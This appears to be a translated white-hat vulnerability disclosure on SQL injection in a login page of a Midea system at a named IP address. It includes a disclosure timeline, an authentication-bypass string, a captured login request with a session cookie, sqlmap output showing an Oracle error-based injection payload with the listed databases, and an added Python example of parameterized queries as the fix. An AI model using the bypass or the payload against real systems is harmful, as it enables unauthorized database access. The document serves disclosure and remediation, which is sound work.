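2015-06-27: Details reported to the vendor; awaiting vendor handling
2015-06-27: Vendor confirmed; details disclosed to the vendor only
2015-07-07: Details disclosed to core white hats and experts in related fields
2015-07-17: Details disclosed to regular white hats
2015-07-27: Details disclosed to intern white hats
2015-08-11: Details disclosed to the public
Midea (美的, meide)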
http://120.132.154.11:8080/web/rdlogin.jsp
0x00
Log in with admin'or'1'='1
Not much use, though.
0x01
Captured request from the login entry point:
POST /web/SubmitLogin.do HTTP/1.1
Host: 120.132.154.11:8080
Proxy-Connection: keep-alive
Content-Length: 125
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://120.132.154.11:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.81 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://120.132.154.11:8080/web/SubmitLogin.do
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: CPCUserName=test; ch1=true; ch2=false; lastloginuser=test; entcode=mdrd; JSESSIONID=6By6VT5B2qn4HhyPT4PlmTvqXLGhQ5xJkwJv324RTww2YYBHXqtd!-549272955

value%28entcode1%29=mdrd&value%28entcode%29=mdrd&value%28userName%29=test&value%28password%29=test&Submit=%E7%99%BB+%E5%BD%95

current schema (equivalent to database on Oracle): 'MDRD'
Place: POST
Parameter: value(userName)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: value(entcode1)=mdrd&value(entcode)=mdrd&value(userName)=test' AND 8955=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(121)||CHR(109)||CHR(116)||CHR(58)||(SELECT (CASE WHEN (8955=8955) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(98)||CHR(107)||CHR(98)||CHR(58)||CHR(62))) FROM DUAL) AND 'uWtW'='uWtW&value(password)=test&Submit=? ?

available databases [4]:
[*] ETWMAIL
[*] MDRD
[*] SYS
[*] SYSTEM
The sqlmap output ran past the screen, so I just copied what was displayed.
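An added example (not code from the original report or from the vendor's application): a minimal Python/SQLite stand-in for the login query behind /web/SubmitLogin.do, showing why the 0x00 input is accepted when request values are concatenated into the SQL text, why a stray quote in value(userName) surfaces a database error, and how bind parameters close both. The user_info schema, the function names, the sample password and the use of SQLite in place of Oracle are assumptions.

```python
import sqlite3

def make_db():
    # Constructed sample data; table and column names are hypothetical.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE user_info (entcode TEXT, username TEXT, password TEXT)")
    db.execute("INSERT INTO user_info VALUES ('mdrd', 'admin', 'S3cret-not-known')")
    return db

def login_concat(db, entcode, username, password):
    """Vulnerable pattern: request values are spliced into the SQL text."""
    sql = ("SELECT username FROM user_info WHERE entcode = '" + entcode +
           "' AND username = '" + username +
           "' AND password = '" + password + "'")
    return db.execute(sql).fetchone() is not None

def login_bound(db, entcode, username, password):
    """Hardened pattern: values travel as bind parameters, never as SQL text."""
    sql = ("SELECT username FROM user_info "
           "WHERE entcode = ? AND username = ? AND password = ?")
    return db.execute(sql, (entcode, username, password)).fetchone() is not None

def outcome(login, db, username, password="x"):
    """Classify one attempt as 'granted', 'denied' or 'db-error'."""
    try:
        return "granted" if login(db, "mdrd", username, password) else "denied"
    except sqlite3.Error:
        # Error-based extraction depends on this error text reaching the client;
        # log it server-side and return a generic failure instead.
        return "db-error"

if __name__ == "__main__":
    db = make_db()
    # Inputs: the 0x00 string from the report, and a lone trailing quote.
    for name in ("admin'or'1'='1", "test'"):
        print(repr(name),
              "concat:", outcome(login_concat, db, name),
              "bound:", outcome(login_bound, db, name))
```

In the Java/JDBC stack this application appears to use, the equivalent of `login_bound` is a `PreparedStatement` with `?` placeholders.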
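Severity: Low
Vulnerability Rank: 5
Confirmed: 2015-06-27 23:31
Thanks to @DloveJ for the heads-up; we are currently confirming the vulnerability information.
None yet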